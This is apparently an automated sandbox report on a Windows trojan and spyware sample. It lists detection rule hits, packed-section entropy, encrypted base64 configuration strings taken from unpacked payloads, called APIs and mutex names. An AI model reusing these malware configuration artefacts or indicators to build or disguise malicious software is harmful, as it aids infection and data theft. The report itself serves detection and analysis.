                                Source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: Section: rtrxnzik ZLIB complexity 0.9944343498734366
                                Source: skotes.exe.11.drStatic PE information: Section: rtrxnzik ZLIB complexity 0.9944343498734366
                                Source: random[2].exe.14.drStatic PE information: Section: .rdata ZLIB complexity 1.0003345630787037
                                Source: random[2].exe.14.drStatic PE information: Section: .rdata ZLIB complexity 1.0003345630787037
                                Source: f891ed3167.exe.14.drStatic PE information: Section: .rdata ZLIB complexity 1.0003345630787037
                                Source: f891ed3167.exe.14.drStatic PE information: Section: .rdata ZLIB complexity 1.0003345630787037
                                Source: random[2].exe0.14.drStatic PE information: Section: .rdata ZLIB complexity 1.0003335336538461
                                Source: random[2].exe0.14.drStatic PE information: Section: .rdata ZLIB complexity 1.0003335336538461
                                Source: f8e8a2d2f0.exe.14.drStatic PE information: Section: .rdata ZLIB complexity 1.0003335336538461
                                Source: f8e8a2d2f0.exe.14.drStatic PE information: Section: .rdata ZLIB complexity 1.0003335336538461
                                Source: random[1].exe0.14.drStatic PE information: Section: ndccpyxw ZLIB complexity 0.9944299768518519
                                Source: 9c1024a1f1.exe.14.drStatic PE information: Section: ndccpyxw ZLIB complexity 0.9944299768518519
                                Source: random[1].exe1.14.drStatic PE information: Section: ZLIB complexity 0.9956691576086957
                                Source: random[1].exe1.14.drStatic PE information: Section: gdiknbhi ZLIB complexity 0.994120884735434
                                Source: 935372fb1f.exe.14.drStatic PE information: Section: ZLIB complexity 0.9956691576086957
                                Source: 935372fb1f.exe.14.drStatic PE information: Section: gdiknbhi ZLIB complexity 0.994120884735434
                                Source: random[1].exe2.14.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                                Source: 7ecb69d7f1.exe.14.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                                Source: random[2].exe2.14.drStatic PE information: Section: ZLIB complexity 0.9960670613354037
                                Source: random[2].exe2.14.drStatic PE information: Section: ndmxoxsq ZLIB complexity 0.9939399614726028
                                Source: c7f37422c5.exe.14.drStatic PE information: Section: ZLIB complexity 0.9960670613354037
                                Source: c7f37422c5.exe.14.drStatic PE information: Section: ndmxoxsq ZLIB complexity 0.9939399614726028
                                Source: random[2].exe.14.dr, s1l70P8mWLYDmBOs6L.csCryptographic APIs: 'CreateDecryptor'
                                Source: f891ed3167.exe.14.dr, s1l70P8mWLYDmBOs6L.csCryptographic APIs: 'CreateDecryptor'
                                Source: random[2].exe0.14.dr, PjMboxrZKVMRiayL4T.csCryptographic APIs: 'CreateDecryptor'
                                Source: random[2].exe0.14.dr, PjMboxrZKVMRiayL4T.csCryptographic APIs: 'CreateDecryptor'
                                Source: f8e8a2d2f0.exe.14.dr, PjMboxrZKVMRiayL4T.csCryptographic APIs: 'CreateDecryptor'
                                Source: f8e8a2d2f0.exe.14.dr, PjMboxrZKVMRiayL4T.csCryptographic APIs: 'CreateDecryptor'
                                Source: random[2].exe.14.dr, Program.csBase64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                                Source: f891ed3167.exe.14.dr, Program.csBase64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                                Source: random[2].exe0.14.dr, Program.csBase64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                                Source: f8e8a2d2f0.exe.14.dr, Program.csBase64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, Settings.csBase64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'GSe2Oo7ZEHEiTMVywbTAXsNRkSJMtBhaVgcpPzcyQpXUaDySFbW83On26eCIEiVa9tWWTFTzFu5prxcyewDgzHNcMYMl1E6l6AYRYKswSzVvzffbIf9tcDBnCKSYXk0HaChWzb7ScdBUr9A6DCGAVlZNDfVCWSyhqFeP6SJm6FaY2OrjlJTKVm6R0USE44YhVzYOoavT2cy3p0l0TRDDuiRT0b61T1mIVq9Wm0wfuuN1xmD1G4h06H0Vb/Fde4DGf9edrroQknCgcOn29zboLgWb4Rtwco9aQYT9QvRWsxLM4EA8geldkwnvM41CQ5ruxvOeMPGWToiZv0JLSo+X5wDkMpwL60QiT9rxnVgMehEUEASpiQCuxIAmINLf3nuhWPItctzIkZD1TxOccqmb9cdfvb4H9uVZd9xX27wSMRO3GHM5B8hKfNmnzEV/DTTwDzUiiDrwnqbVE4t3j+wRN4wNsedMGnlHi5KmqVeTtRtWwikfGJ8bJBa9Qsotu4v2nDaIfiCuxKQ7FRc3eXo4cs367L6+6n/E3SUnphfuG+hhFODCCGnwzrs985nTVNBp0sr7e7wDSh0PcNPqkZuSH8zOO8B2swybXWIX9Il4vzukYC/tm8JNG/eVBC+6mdQiP6QfrZ7YhuO7vzLZkP4alrKAwLq0V86FQoWGz7gbP2AJpHi/wCObps8WAjWTUAwIvH3qfi67jz1akIdUxD5MbedGqwgxsfxGgML5nn3U1Ugcwskxc4pOaJc6BN+j56cRA2dejXSpXEvgs1p0xmldi+zXYimFZQx8FnJPzuVgz9Rh9NRPsNbnEfIZiWCo/4Ba4WqSTTkuBFZL+yw+jxBMi28cX1NWcJtKOkVUw1zbnU8a3ucAxItDBicI23QMsdUIa5SSbW/74XwTBhDnnjHlFH+DQbp8mMW/tmOLJMuc12+n5qou4PDlwN24Bc5ceyPbcy09EC8BJDi16I9g1y3pow==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, Settings.csBase64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'GSe2Oo7ZEHEiTMVywbTAXsNRkSJMtBhaVgcpPzcyQpXUaDySFbW83On26eCIEiVa9tWWTFTzFu5prxcyewDgzHNcMYMl1E6l6AYRYKswSzVvzffbIf9tcDBnCKSYXk0HaChWzb7ScdBUr9A6DCGAVlZNDfVCWSyhqFeP6SJm6FaY2OrjlJTKVm6R0USE44YhVzYOoavT2cy3p0l0TRDDuiRT0b61T1mIVq9Wm0wfuuN1xmD1G4h06H0Vb/Fde4DGf9edrroQknCgcOn29zboLgWb4Rtwco9aQYT9QvRWsxLM4EA8geldkwnvM41CQ5ruxvOeMPGWToiZv0JLSo+X5wDkMpwL60QiT9rxnVgMehEUEASpiQCuxIAmINLf3nuhWPItctzIkZD1TxOccqmb9cdfvb4H9uVZd9xX27wSMRO3GHM5B8hKfNmnzEV/DTTwDzUiiDrwnqbVE4t3j+wRN4wNsedMGnlHi5KmqVeTtRtWwikfGJ8bJBa9Qsotu4v2nDaIfiCuxKQ7FRc3eXo4cs367L6+6n/E3SUnphfuG+hhFODCCGnwzrs985nTVNBp0sr7e7wDSh0PcNPqkZuSH8zOO8B2swybXWIX9Il4vzukYC/tm8JNG/eVBC+6mdQiP6QfrZ7YhuO7vzLZkP4alrKAwLq0V86FQoWGz7gbP2AJpHi/wCObps8WAjWTUAwIvH3qfi67jz1akIdUxD5MbedGqwgxsfxGgML5nn3U1Ugcwskxc4pOaJc6BN+j56cRA2dejXSpXEvgs1p0xmldi+zXYimFZQx8FnJPzuVgz9Rh9NRPsNbnEfIZiWCo/4Ba4WqSTTkuBFZL+yw+jxBMi28cX1NWcJtKOkVUw1zbnU8a3ucAxItDBicI23QMsdUIa5SSbW/74XwTBhDnnjHlFH+DQbp8mMW/tmOLJMuc12+n5qou4PDlwN24Bc5ceyPbcy09EC8BJDi16I9g1y3pow==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, Settings.csBase64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'GSe2Oo7ZEHEiTMVywbTAXsNRkSJMtBhaVgcpPzcyQpXUaDySFbW83On26eCIEiVa9tWWTFTzFu5prxcyewDgzHNcMYMl1E6l6AYRYKswSzVvzffbIf9tcDBnCKSYXk0HaChWzb7ScdBUr9A6DCGAVlZNDfVCWSyhqFeP6SJm6FaY2OrjlJTKVm6R0USE44YhVzYOoavT2cy3p0l0TRDDuiRT0b61T1mIVq9Wm0wfuuN1xmD1G4h06H0Vb/Fde4DGf9edrroQknCgcOn29zboLgWb4Rtwco9aQYT9QvRWsxLM4EA8geldkwnvM41CQ5ruxvOeMPGWToiZv0JLSo+X5wDkMpwL60QiT9rxnVgMehEUEASpiQCuxIAmINLf3nuhWPItctzIkZD1TxOccqmb9cdfvb4H9uVZd9xX27wSMRO3GHM5B8hKfNmnzEV/DTTwDzUiiDrwnqbVE4t3j+wRN4wNsedMGnlHi5KmqVeTtRtWwikfGJ8bJBa9Qsotu4v2nDaIfiCuxKQ7FRc3eXo4cs367L6+6n/E3SUnphfuG+hhFODCCGnwzrs985nTVNBp0sr7e7wDSh0PcNPqkZuSH8zOO8B2swybXWIX9Il4vzukYC/tm8JNG/eVBC+6mdQiP6QfrZ7YhuO7vzLZkP4alrKAwLq0V86FQoWGz7gbP2AJpHi/wCObps8WAjWTUAwIvH3qfi67jz1akIdUxD5MbedGqwgxsfxGgML5nn3U1Ugcwskxc4pOaJc6BN+j56cRA2dejXSpXEvgs1p0xmldi+zXYimFZQx8FnJPzuVgz9Rh9NRPsNbnEfIZiWCo/4Ba4WqSTTkuBFZL+yw+jxBMi28cX1NWcJtKOkVUw1zbnU8a3ucAxItDBicI23QMsdUIa5SSbW/74XwTBhDnnjHlFH+DQbp8mMW/tmOLJMuc12+n5qou4PDlwN24Bc5ceyPbcy09EC8BJDi16I9g1y3pow==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, Settings.csBase64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'GSe2Oo7ZEHEiTMVywbTAXsNRkSJMtBhaVgcpPzcyQpXUaDySFbW83On26eCIEiVa9tWWTFTzFu5prxcyewDgzHNcMYMl1E6l6AYRYKswSzVvzffbIf9tcDBnCKSYXk0HaChWzb7ScdBUr9A6DCGAVlZNDfVCWSyhqFeP6SJm6FaY2OrjlJTKVm6R0USE44YhVzYOoavT2cy3p0l0TRDDuiRT0b61T1mIVq9Wm0wfuuN1xmD1G4h06H0Vb/Fde4DGf9edrroQknCgcOn29zboLgWb4Rtwco9aQYT9QvRWsxLM4EA8geldkwnvM41CQ5ruxvOeMPGWToiZv0JLSo+X5wDkMpwL60QiT9rxnVgMehEUEASpiQCuxIAmINLf3nuhWPItctzIkZD1TxOccqmb9cdfvb4H9uVZd9xX27wSMRO3GHM5B8hKfNmnzEV/DTTwDzUiiDrwnqbVE4t3j+wRN4wNsedMGnlHi5KmqVeTtRtWwikfGJ8bJBa9Qsotu4v2nDaIfiCuxKQ7FRc3eXo4cs367L6+6n/E3SUnphfuG+hhFODCCGnwzrs985nTVNBp0sr7e7wDSh0PcNPqkZuSH8zOO8B2swybXWIX9Il4vzukYC/tm8JNG/eVBC+6mdQiP6QfrZ7YhuO7vzLZkP4alrKAwLq0V86FQoWGz7gbP2AJpHi/wCObps8WAjWTUAwIvH3qfi67jz1akIdUxD5MbedGqwgxsfxGgML5nn3U1Ugcwskxc4pOaJc6BN+j56cRA2dejXSpXEvgs1p0xmldi+zXYimFZQx8FnJPzuVgz9Rh9NRPsNbnEfIZiWCo/4Ba4WqSTTkuBFZL+yw+jxBMi28cX1NWcJtKOkVUw1zbnU8a3ucAxItDBicI23QMsdUIa5SSbW/74XwTBhDnnjHlFH+DQbp8mMW/tmOLJMuc12+n5qou4PDlwN24Bc5ceyPbcy09EC8BJDi16I9g1y3pow==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, Settings.csBase64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'GSe2Oo7ZEHEiTMVywbTAXsNRkSJMtBhaVgcpPzcyQpXUaDySFbW83On26eCIEiVa9tWWTFTzFu5prxcyewDgzHNcMYMl1E6l6AYRYKswSzVvzffbIf9tcDBnCKSYXk0HaChWzb7ScdBUr9A6DCGAVlZNDfVCWSyhqFeP6SJm6FaY2OrjlJTKVm6R0USE44YhVzYOoavT2cy3p0l0TRDDuiRT0b61T1mIVq9Wm0wfuuN1xmD1G4h06H0Vb/Fde4DGf9edrroQknCgcOn29zboLgWb4Rtwco9aQYT9QvRWsxLM4EA8geldkwnvM41CQ5ruxvOeMPGWToiZv0JLSo+X5wDkMpwL60QiT9rxnVgMehEUEASpiQCuxIAmINLf3nuhWPItctzIkZD1TxOccqmb9cdfvb4H9uVZd9xX27wSMRO3GHM5B8hKfNmnzEV/DTTwDzUiiDrwnqbVE4t3j+wRN4wNsedMGnlHi5KmqVeTtRtWwikfGJ8bJBa9Qsotu4v2nDaIfiCuxKQ7FRc3eXo4cs367L6+6n/E3SUnphfuG+hhFODCCGnwzrs985nTVNBp0sr7e7wDSh0PcNPqkZuSH8zOO8B2swybXWIX9Il4vzukYC/tm8JNG/eVBC+6mdQiP6QfrZ7YhuO7vzLZkP4alrKAwLq0V86FQoWGz7gbP2AJpHi/wCObps8WAjWTUAwIvH3qfi67jz1akIdUxD5MbedGqwgxsfxGgML5nn3U1Ugcwskxc4pOaJc6BN+j56cRA2dejXSpXEvgs1p0xmldi+zXYimFZQx8FnJPzuVgz9Rh9NRPsNbnEfIZiWCo/4Ba4WqSTTkuBFZL+yw+jxBMi28cX1NWcJtKOkVUw1zbnU8a3ucAxItDBicI23QMsdUIa5SSbW/74XwTBhDnnjHlFH+DQbp8mMW/tmOLJMuc12+n5qou4PDlwN24Bc5ceyPbcy09EC8BJDi16I9g1y3pow==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, Settings.csBase64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'GSe2Oo7ZEHEiTMVywbTAXsNRkSJMtBhaVgcpPzcyQpXUaDySFbW83On26eCIEiVa9tWWTFTzFu5prxcyewDgzHNcMYMl1E6l6AYRYKswSzVvzffbIf9tcDBnCKSYXk0HaChWzb7ScdBUr9A6DCGAVlZNDfVCWSyhqFeP6SJm6FaY2OrjlJTKVm6R0USE44YhVzYOoavT2cy3p0l0TRDDuiRT0b61T1mIVq9Wm0wfuuN1xmD1G4h06H0Vb/Fde4DGf9edrroQknCgcOn29zboLgWb4Rtwco9aQYT9QvRWsxLM4EA8geldkwnvM41CQ5ruxvOeMPGWToiZv0JLSo+X5wDkMpwL60QiT9rxnVgMehEUEASpiQCuxIAmINLf3nuhWPItctzIkZD1TxOccqmb9cdfvb4H9uVZd9xX27wSMRO3GHM5B8hKfNmnzEV/DTTwDzUiiDrwnqbVE4t3j+wRN4wNsedMGnlHi5KmqVeTtRtWwikfGJ8bJBa9Qsotu4v2nDaIfiCuxKQ7FRc3eXo4cs367L6+6n/E3SUnphfuG+hhFODCCGnwzrs985nTVNBp0sr7e7wDSh0PcNPqkZuSH8zOO8B2swybXWIX9Il4vzukYC/tm8JNG/eVBC+6mdQiP6QfrZ7YhuO7vzLZkP4alrKAwLq0V86FQoWGz7gbP2AJpHi/wCObps8WAjWTUAwIvH3qfi67jz1akIdUxD5MbedGqwgxsfxGgML5nn3U1Ugcwskxc4pOaJc6BN+j56cRA2dejXSpXEvgs1p0xmldi+zXYimFZQx8FnJPzuVgz9Rh9NRPsNbnEfIZiWCo/4Ba4WqSTTkuBFZL+yw+jxBMi28cX1NWcJtKOkVUw1zbnU8a3ucAxItDBicI23QMsdUIa5SSbW/74XwTBhDnnjHlFH+DQbp8mMW/tmOLJMuc12+n5qou4PDlwN24Bc5ceyPbcy09EC8BJDi16I9g1y3pow==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, Settings.csBase64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'GSe2Oo7ZEHEiTMVywbTAXsNRkSJMtBhaVgcpPzcyQpXUaDySFbW83On26eCIEiVa9tWWTFTzFu5prxcyewDgzHNcMYMl1E6l6AYRYKswSzVvzffbIf9tcDBnCKSYXk0HaChWzb7ScdBUr9A6DCGAVlZNDfVCWSyhqFeP6SJm6FaY2OrjlJTKVm6R0USE44YhVzYOoavT2cy3p0l0TRDDuiRT0b61T1mIVq9Wm0wfuuN1xmD1G4h06H0Vb/Fde4DGf9edrroQknCgcOn29zboLgWb4Rtwco9aQYT9QvRWsxLM4EA8geldkwnvM41CQ5ruxvOeMPGWToiZv0JLSo+X5wDkMpwL60QiT9rxnVgMehEUEASpiQCuxIAmINLf3nuhWPItctzIkZD1TxOccqmb9cdfvb4H9uVZd9xX27wSMRO3GHM5B8hKfNmnzEV/DTTwDzUiiDrwnqbVE4t3j+wRN4wNsedMGnlHi5KmqVeTtRtWwikfGJ8bJBa9Qsotu4v2nDaIfiCuxKQ7FRc3eXo4cs367L6+6n/E3SUnphfuG+hhFODCCGnwzrs985nTVNBp0sr7e7wDSh0PcNPqkZuSH8zOO8B2swybXWIX9Il4vzukYC/tm8JNG/eVBC+6mdQiP6QfrZ7YhuO7vzLZkP4alrKAwLq0V86FQoWGz7gbP2AJpHi/wCObps8WAjWTUAwIvH3qfi67jz1akIdUxD5MbedGqwgxsfxGgML5nn3U1Ugcwskxc4pOaJc6BN+j56cRA2dejXSpXEvgs1p0xmldi+zXYimFZQx8FnJPzuVgz9Rh9NRPsNbnEfIZiWCo/4Ba4WqSTTkuBFZL+yw+jxBMi28cX1NWcJtKOkVUw1zbnU8a3ucAxItDBicI23QMsdUIa5SSbW/74XwTBhDnnjHlFH+DQbp8mMW/tmOLJMuc12+n5qou4PDlwN24Bc5ceyPbcy09EC8BJDi16I9g1y3pow==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@86/57@25/7
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D37B5 GetLastError,FormatMessageW,0_2_009D37B5
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C10BF AdjustTokenPrivileges,CloseHandle,0_2_009C10BF
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009C16C3
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009D51CD
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009EA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_009EA67C
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D648E CoInitialize,CoCreateInstance,CoUninitialize,0_2_009D648E
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009642A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_009642A2
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6064
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\yBu0GW2G5zAc
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
